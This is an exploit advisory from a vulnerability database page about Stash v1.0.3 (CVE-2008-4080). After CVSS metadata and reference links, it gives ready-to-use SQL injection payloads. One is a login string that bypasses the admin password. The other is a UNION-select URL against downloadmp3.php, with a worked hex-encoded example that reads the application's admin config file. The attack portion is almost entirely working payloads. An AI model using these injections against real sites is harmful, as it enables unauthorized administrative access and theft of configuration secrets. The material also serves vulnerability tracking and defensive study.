Bug: Stash v1.0.3 Admin bypass / Remote File Disclosure ( Ascii Version )

Search:
WLB2

Stash v1.0.3 Admin bypass / Remote File Disclosure

Published
Credit
Risk
2008.09.10
r3d.w0rm
Medium
CWE
CVE
Local
Remote
CWE-89
CVE-2008-4080
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
6.8/10
6.4/10
8.6/10
Exploit range
Attack complexity
Authentication
Remote
Medium
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
Partial
Partial

#############################
#### Stash v1.0.3 Admin bypass / Remote File Disclosure ####
############################
# #
#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr)) #
#Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr)) #
#Our Site : http://IRCRASH.COM #
#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) #
############################
# #
#Download : http://kent.dl.sourceforge.net/sourceforge/nice-stash/stash-1.0.3.tar.gz#
# #
#DORK : :( #
# #
############################
# [Admin by pass] #
# #
#http://Site/[path]/admin/login #
#Username : ' or 1=1/* #
#Password : R3d.W0rm #
# #
################################
# [Remote File Disclosure] #
# #
#http://Site/[path]/downloadmp3.php?download=-99999'+union+select+0,1,2,3,4,concat(0x[file name in hex])/*
# #
#Note : You must enter file name in hex in valun address to download it . #
#Ex. ../../admin/config.php == 2E2E2F2E2E2F61646D696E2F636F6E6669672E706870 #
#http://Site/[path]/downloadmp3.php?download=-99999'+union+select+0,1,2,3,4,concat(0x2E2E2F2E2E2F61646D696E2F636F6E66696
72E706870)/*
# #
###############################
# Site : http://IRCRASH.COM #
###################################### TNX GOD ######################################

References:

http://xforce.iss.net/xforce/xfdb/44989
http://www.securityfocus.com/bid/31079
http://www.securityfocus.com/archive/1/archive/1/496142/100/0/threaded
http://secunia.com/advisories/31818
http://milw0rm.com/exploits/6402

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version